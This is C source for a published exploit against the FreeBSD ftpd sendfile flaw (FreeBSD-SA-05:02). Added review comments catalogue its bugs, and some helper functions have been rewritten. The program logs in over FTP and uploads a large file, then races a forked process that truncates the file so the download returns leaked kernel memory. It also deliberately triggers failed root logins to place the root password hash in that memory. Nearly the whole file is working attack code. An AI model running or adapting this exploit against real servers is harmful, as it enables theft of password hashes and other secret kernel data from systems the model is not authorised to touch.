  1. /*FreeBSD <= 5.4-RELEASE ftpd (Version 6.00LS) sendfile kernel mem-leak
  2. by Kingcope
  3. February 2011
  4. --
  5. kernel memory file may contain secret hashes and more..
  6. tested on FreeBSD 5.3-RELEASE
  7.  
  8. reference: FreeBSD-SA-05:02.sendfile
  9. */
  10.  
  11. #include <stdio.h>
  12. #include <stdlib.h>
  13. #include <string.h>
  14. #include <unistd.h>
  15. #include <sys/types.h>
  16. #include <netinet/in.h>
  17. #include <sys/socket.h>
  18. #include <netdb.h>
  19. #include <fcntl.h>
  20. #include <unistd.h>
  21.  
/* Helpers defined below main().
 * NOTE(review): `getline` here is the file's own void getline(int).  On libcs
 * that declare POSIX getline(3) in <stdio.h> (a different signature) this
 * prototype conflicts and the file will not compile without a rename. */
int createconnection(char *target, char *targetport);
void getline(int s);
void putline(int s, char *out);
void usage(char *exe);

/* Shared I/O buffers: `in` receives FTP replies (getline), `out` holds the
 * outgoing command line (putline).  `out2` is declared but never used. */
char in[8096];
char out[8096];
char out2[8096];
  30.  
/*
 * Entry point: drives the FTP control session described in the file header
 * (login, one STOR upload, a forked second session, then a RETR download).
 *
 * Review notes -- defects visible in this function, left unchanged here:
 *  - `fd` is read by close(fd) twice (after the upload and in the forked
 *    child) before it is first assigned by open() near the end: a read of
 *    an uninitialized int.
 *  - `len` is an int but accept() expects a socklen_t *; same width on the
 *    usual ABIs, but strictly a type mismatch.
 *  - strtok()/atoi() on the -i value never check for NULL: an address with
 *    fewer than three dots passes NULL to atoi(), which is undefined.
 *  - write()/recv()/write() results are unchecked; in the upload loop a
 *    failing write() decrements `k`, so the loop cannot terminate.
 *  - malloc failure exits with status 0; fork() failure (-1) is not detected.
 *  - the forked child ends in `while(1);` and is never waited for or killed.
 *  - the output file is created with mode 0777 and without O_EXCL/O_TRUNC.
 *  - FTP reply codes are never parsed; getline() only echoes the reply.
 *  - the first listener `s2` is overwritten by a second socket() without
 *    being closed.
 */
int main(int argc, char *argv[]) {
    extern int optind;                      /* declared by <unistd.h>; not read here */
    extern char *optarg;
    int s,s2,s3,s4,nsock,nsock2;            /* s/s3: control sockets; s2/s4: listeners; nsock/nsock2: accepted data sockets */
    int c,k,len;
    int fd,lockfd;                          /* fd: local output file (assigned only by the open() near the end); lockfd: exploit.lck */
    int total_kmem_size=0;                  /* -s, in MB; must be >= 10 */

    char *target = NULL;                    /* -h */
    char *username = NULL;                  /* -l */
    char *password = NULL;                  /* -k */
    char *writeto = ".";                    /* -d: remote directory passed to CWD */
    char *targetport = "21";                /* -p */
    char *myip = NULL;                      /* -i; three copies because strtok() destroys its argument */
    char *myip2 = NULL;
    char *myip3 = NULL;
    int octet_in[4], port;
    struct sockaddr_in yo, yo2, cli, cli2;
    char *oct = NULL;

    /* Option parsing.  Every string option is copied to the heap (never
     * freed; process lifetime).  -s goes through atoi(), so a non-numeric
     * value silently becomes 0 and is rejected by the check below. */
    while ((c = getopt(argc, argv, "h:i:p:l:k:d:s:")) != EOF) {
        switch(c) {
        case 'h':
            target = (char*)malloc(strlen(optarg)+1);
            strcpy(target, optarg);
            break;
        case 'i':
            myip = (char*)malloc(strlen(optarg)+1);
            strcpy(myip, optarg);
            myip2 = (char*)malloc(strlen(optarg)+1);
            strcpy(myip2, optarg);
            myip3 = (char*)malloc(strlen(optarg)+1);
            strcpy(myip3, optarg);
            break;
        case 'p':
            targetport = (char*)malloc(strlen(optarg)+1);
            strcpy(targetport, optarg);
            break;
        case 'l':
            username = (char*)malloc(strlen(optarg)+1);
            strcpy(username, optarg);
            break;
        case 'k':
            password = (char*)malloc(strlen(optarg)+1);
            strcpy(password, optarg);
            break;
        case 'd':
            writeto = (char*)malloc(strlen(optarg)+1);
            strcpy(writeto, optarg);
            break;
        case 's':
            total_kmem_size = atoi(optarg);
            break;

        default:
            usage(argv[0]);                 /* usage() exits; no fallthrough */
        }
    }

    if (target == NULL || myip == NULL)
        usage(argv[0]);

    if (total_kmem_size < 10) {
        printf("size must be greater or equal 10.\n");
        usage(argv[0]);
    }

    if (username == NULL || password == NULL) {
        usage(argv[0]);
    }

    /* Control connection; the first getline() consumes the banner. */
    s = createconnection(target, targetport);
    getline(s);

    fprintf(stderr, "populating root hash in memory...\n");

    /* Three USER root / PASS abcdef attempts; the message above states the
     * author's intent.  Replies are echoed, never checked. */
    for (k=0;k<3;k++) {
        snprintf(out, sizeof out, "USER root\r\n");
        putline(s, out);
        getline(s);
        snprintf(out, sizeof out, "PASS abcdef\r\n");
        putline(s,out);
        getline(s);
    }

    fprintf(stderr, "logging in...\n");

    snprintf(out, sizeof out, "USER %s\r\n", username);
    putline(s, out);
    getline(s);
    snprintf(out, sizeof out, "PASS %s\r\n", password);
    putline(s,out);
    getline(s);

    fprintf(stderr, "changing to writeable directory...\n");

    snprintf(out, sizeof out, "CWD %s\r\n", writeto);
    putline(s, out);
    getline(s);

    fprintf(stderr, "putting file. this may take some time (%dMB)...\n", total_kmem_size);

    snprintf(out, sizeof out, "TYPE I\r\n");
    putline(s, out);
    getline(s);

    /* Active-mode data connection: listen locally, announce it with PORT.
     * The port is derived from the pid; where pid values are large the sum
     * can exceed 65535 and htons() silently truncates it. */
    port = getpid() + 2048;
    len = sizeof(cli);                      /* int, but accept() wants socklen_t * */

    bzero(&yo, sizeof(yo));
    yo.sin_family = AF_INET;
    yo.sin_port=htons(port);
    yo.sin_addr.s_addr = htonl(INADDR_ANY);

    /* Split -i into dotted-quad octets.  No NULL check: an address with
     * fewer than three dots hands NULL to atoi(). */
    oct=(char *)strtok(myip,".");
    octet_in[0]=atoi(oct);
    oct=(char *)strtok(NULL,".");
    octet_in[1]=atoi(oct);
    oct=(char *)strtok(NULL,".");
    octet_in[2]=atoi(oct);
    oct=(char *)strtok(NULL,".");
    octet_in[3]=atoi(oct);

    snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
    putline(s, out);
    getline(s);

    if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        return -1;
    }

    if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
        perror("bind");
        close(s2);
        exit(1);
    }

    if (listen(s2, 10) < 0) {
        perror("listen");
        close(s2);
        exit(1);
    }

    snprintf(out, sizeof out, "STOR kernelmemory\r\n");
    putline(s, out);
    getline(s);

    sleep(1);                               /* fixed delay instead of waiting on the server reply */

    if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
        perror("accept");
        close(s);
        exit(1);
    }


    k=0;

    /* Upload: a 10 MiB buffer of 'C' is written repeatedly until
     * total_kmem_size MiB have gone out.  write() is unchecked -- on -1
     * `k` decreases and the loop never ends -- and the progress line only
     * appears when `k` happens to be a multiple of 1000. */
    char *out3=NULL;
    out3 = (char*)malloc(1024*1024*10);
    if (out3 == NULL) {
        perror("malloc");
        exit(0);                            /* exits with success status on failure */
    }

    memset(out3, 'C', 10*1024*1024);

    do {
        k += write(nsock, out3, 10*1024*1024);
        if (k % 1000 == 0)
            fprintf(stderr, "\r\r\r%d|%d ", k, total_kmem_size * 1024 * 1024);
    } while (k < total_kmem_size * 1024 * 1024);

    free(out3);

    close(nsock);
    close(fd);                              /* BUG: fd has not been assigned yet (uninitialized read) */
    getline(s);

    fprintf(stderr, "getting file...\n");
    fprintf(stderr, "forking truncate process into background.\n");

    unlink("exploit.lck");

    /* Child (the author's "truncate process"): opens a second control
     * session, busy-polls until the parent creates exploit.lck, then issues
     * another STOR of the same remote name and closes the data connection
     * without sending anything.  fork() == -1 is not distinguished from the
     * parent path, and the child is never waited for or killed. */
    if (fork() == 0) {
        fprintf(stderr, "=====START TRUNCATE FILE PROCESS ======\n");
        s3 = createconnection(target, targetport);
        getline(s3);

        snprintf(out, sizeof out, "USER %s\r\n", username);
        putline(s3, out);
        getline(s3);
        snprintf(out, sizeof out, "PASS %s\r\n", password);
        putline(s3,out);
        getline(s3);

        /* Spin until exploit.lck exists.  The descriptor open() returns on
         * success is never closed, and a descriptor of 0 would count as
         * failure. */
        while(1) {
            if (open("exploit.lck", O_RDONLY) > 0) {
                break;
            }
        }

        snprintf(out, sizeof out, "TYPE I\r\n");
        putline(s3, out);
        getline(s3);

        port = getpid() + 4000;
        len = sizeof(cli2);

        bzero(&yo2, sizeof(yo2));
        yo2.sin_family = AF_INET;
        yo2.sin_port=htons(port);
        yo2.sin_addr.s_addr = htonl(INADDR_ANY);

        /* Same unchecked strtok()/atoi() split as above, on the third copy. */
        oct=(char *)strtok(myip3,".");
        octet_in[0]=atoi(oct);
        oct=(char *)strtok(NULL,".");
        octet_in[1]=atoi(oct);
        oct=(char *)strtok(NULL,".");
        octet_in[2]=atoi(oct);
        oct=(char *)strtok(NULL,".");
        octet_in[3]=atoi(oct);

        snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
        putline(s3, out);
        getline(s3);

        if ((s4=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
            perror("socket");
            return -1;
        }

        if ((bind(s4, (struct sockaddr *) &yo2, sizeof(yo2))) < 0) {
            perror("bind");
            close(s3);                      /* closes the control socket; s4 is left open */
            exit(1);
        }

        if (listen(s4, 10) < 0) {
            perror("listen");
            close(s2);                      /* s2 is the parent's listener inherited across fork(); s4 is left open */
            exit(1);
        }

        snprintf(out, sizeof out, "STOR kernelmemory\r\n");
        putline(s3, out);
        getline(s3);

        sleep(1);

        if ((nsock2 = accept(s4, (struct sockaddr *)&cli2, &len)) < 0) {
            perror("accept");
            close(s);
            exit(1);
        }

        /* Data connection closed immediately; nothing is written on it. */
        close(nsock2);
        close(fd);                          /* BUG: fd is still uninitialized in the child too */

        close(s4);
        fprintf(stderr, "=====END TRUNCATE FILE PROCESS ======\n\n");
        fprintf(stderr, "Wait for the download to complete...\n");

        while(1);                           /* child never exits on its own */
    }

    /* Parent: download the remote file over a fresh active-mode connection. */
    snprintf(out, sizeof out, "REST 0\r\n");
    putline(s, out);
    getline(s);

    snprintf(out, sizeof out, "TYPE I\r\n");
    putline(s, out);
    getline(s);

    port = getpid() + 1024;
    len = sizeof(cli);

    bzero(&yo, sizeof(yo));
    yo.sin_family = AF_INET;
    yo.sin_port=htons(port);
    yo.sin_addr.s_addr = htonl(INADDR_ANY);

    /* Second copy of -i, because the first was consumed by strtok(). */
    oct=(char *)strtok(myip2,".");
    octet_in[0]=atoi(oct);
    oct=(char *)strtok(NULL,".");
    octet_in[1]=atoi(oct);
    oct=(char *)strtok(NULL,".");
    octet_in[2]=atoi(oct);
    oct=(char *)strtok(NULL,".");
    octet_in[3]=atoi(oct);

    snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
    putline(s, out);
    getline(s);

    /* s2 is reassigned here without closing the earlier listener (leaked). */
    if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        return -1;
    }

    if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
        perror("bind");
        close(s2);
        exit(1);
    }

    if (listen(s2, 10) < 0) {
        perror("listen");
        close(s2);
        exit(1);
    }

    snprintf(out, sizeof out, "CWD %s\r\n", writeto);
    putline(s, out);
    getline(s);

    snprintf(out, sizeof out, "RETR kernelmemory\r\n");
    putline(s, out);
    getline(s);

    /* The only unbounded sprintf() in the file; a pid fits comfortably in
     * 8096 bytes, but it is inconsistent with the snprintf() used elsewhere. */
    sprintf(out, "kernelmemory.%d", getpid());
    fprintf(stderr, "saving kernel memory to >>> %s <<<\n", out);

    /* Local output file: mode 0777 (world-writable/executable, subject to
     * umask), no O_TRUNC (a longer pre-existing file keeps its tail) and no
     * O_EXCL (a pre-existing file or symlink at that name is reused). */
    fd = open(out, O_WRONLY | O_CREAT, 0777);
    if (fd == -1) {
        perror("open on local 'kernelmemory' file");
        close(s);
        exit(1);
    }

    sleep(1);

    if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
        perror("accept");
        close(s);
        exit(1);
    }

    /* Download loop.  Once more than 1 KiB has arrived, every further chunk
     * re-creates exploit.lck (the child's trigger) and sleeps one second,
     * which throttles the rest of the transfer to one recv() per second.
     * open() and write() results are unchecked (close(-1) is harmless; a
     * short or failed write() to the file is lost). */
    int k2=0;
    char *in2 = (char*)malloc(1024*1024*10);
    if (in2 == NULL) {
        perror("malloc");
        exit(0);                            /* exits with success status on failure */
    }
    do {
        k = recv(nsock, in2, 1024*1024*10, 0);
        if (k < 1) break;
        k2+=k;
        // if (k2 % 1000 == 0)
        fprintf(stderr, "\r\r\rREAD=%d BYTES ", k2);

        if (k2 > 1024) {
            lockfd = open("exploit.lck", O_CREAT|O_RDWR, 0777);
            sleep(1);
            close(lockfd);
        }
        write(fd, in2, k);
    } while (k > 0);

    free(in2);

    getline(s);                             /* transfer-complete reply */

    close(nsock);
    close(fd);
    close(s);

    /* Falls off the end: reaching the closing brace of main() yields
     * status 0 in C99 and later. */
}
  400.  
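/*
 * Open a TCP connection to target:targetport.
 *
 * Resolves the name with getaddrinfo() and tries every returned address in
 * order until connect() succeeds (the original used only the first result
 * and leaked the addrinfo list).  getaddrinfo() reports failures through
 * its return value rather than errno, so gai_strerror() is used instead of
 * perror().  On resolver failure or when no address is reachable the error
 * is printed and the process exits with status 1 -- the file's convention;
 * callers never expect a failed return.
 *
 * @param target      host name or address, in getaddrinfo() syntax
 * @param targetport  service name or numeric port string
 * @return a connected socket descriptor; the caller owns it and close()s it
 */
int createconnection(char *target, char *targetport) {
    struct addrinfo hints = { .ai_family = AF_UNSPEC, .ai_socktype = SOCK_STREAM };
    struct addrinfo *res = NULL;
    int s = -1;

    int gai = getaddrinfo(target, targetport, &hints, &res);
    if (gai != 0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(gai));
        exit(1);
    }

    for (struct addrinfo *ai = res; ai != NULL; ai = ai->ai_next) {
        s = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
        if (s < 0) {
            perror("socket");
            continue;                       /* try the next address family */
        }
        if (connect(s, ai->ai_addr, ai->ai_addrlen) == 0) {
            break;                          /* connected */
        }
        perror("connect");
        close(s);
        s = -1;
    }
    freeaddrinfo(res);

    if (s < 0) {
        fprintf(stderr, "createconnection: could not connect to %s:%s\n", target, targetport);
        exit(1);
    }

    return s;
}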
  427.  
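/*
 * Read one chunk of the FTP reply from socket s into the global `in`
 * buffer and echo it to stderr.
 *
 * This is the file's own void getline(int), not POSIX getline(3); on libcs
 * that declare the POSIX one in <stdio.h> the prototype conflicts and the
 * function should be renamed.
 *
 * A single recv() is used, so one reply may arrive split across calls or
 * several replies in one; the reply code is never parsed.  The read is
 * limited to sizeof in - 1 bytes so the buffer stays NUL-terminated before
 * it is printed with %s (the original read sizeof in bytes and could print
 * past the end of `in`).  On a peer close or recv() error the socket is
 * closed and the process exits with status 1, the file's convention.
 *
 * @param s  connected control socket
 */
void getline(int s)
{
    memset(in, '\0', sizeof in);

    ssize_t got = recv(s, in, sizeof in - 1, 0);
    if (got == 0) {
        /* errno is not set on an orderly close, so perror() would mislead. */
        fprintf(stderr, "recv: connection closed by peer\n");
        close(s);
        exit(1);
    }
    if (got < 0) {
        perror("recv");
        close(s);
        exit(1);
    }

    fprintf(stderr, "<\t%s", in);
}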
  439.  
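/*
 * Send one FTP command line on socket s and echo it to stderr.
 *
 * send() on a stream socket may deliver fewer bytes than requested, so the
 * call is repeated until the whole NUL-terminated line has gone out (the
 * original issued a single send() and ignored a short count).  On a send()
 * error the message is printed, s is closed and the process exits with
 * status 1 -- the file's convention; nothing is returned to the caller.
 *
 * @param s    connected socket
 * @param out  NUL-terminated command line, including its trailing "\r\n"
 */
void putline(int s, char *out) {
    fprintf(stderr, ">\t%s", out);

    size_t remaining = strlen(out);
    const char *p = out;
    while (remaining > 0) {
        ssize_t sent = send(s, p, remaining, 0);
        if (sent == -1) {
            perror("send");
            close(s);
            exit(1);
        }
        p += sent;
        remaining -= (size_t)sent;
    }
}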
  449.  
/*
 * Print the command-line synopsis to stderr and terminate.
 *
 * Reached from every option error and from the missing-option checks in
 * main(); note that it exits with status 0 even on those error paths.
 *
 * @param exe  argv[0], printed as the program name
 */
void usage(char *exe)
{
    static const char synopsis[] =
        "%s <-h host> <-i your internal ip> <-s size in MB to read from kernel> [-p port] <-l username> <-k password>"
        " [-d writable directory] \n";

    fprintf(stderr, synopsis, exe);
    exit(0);
}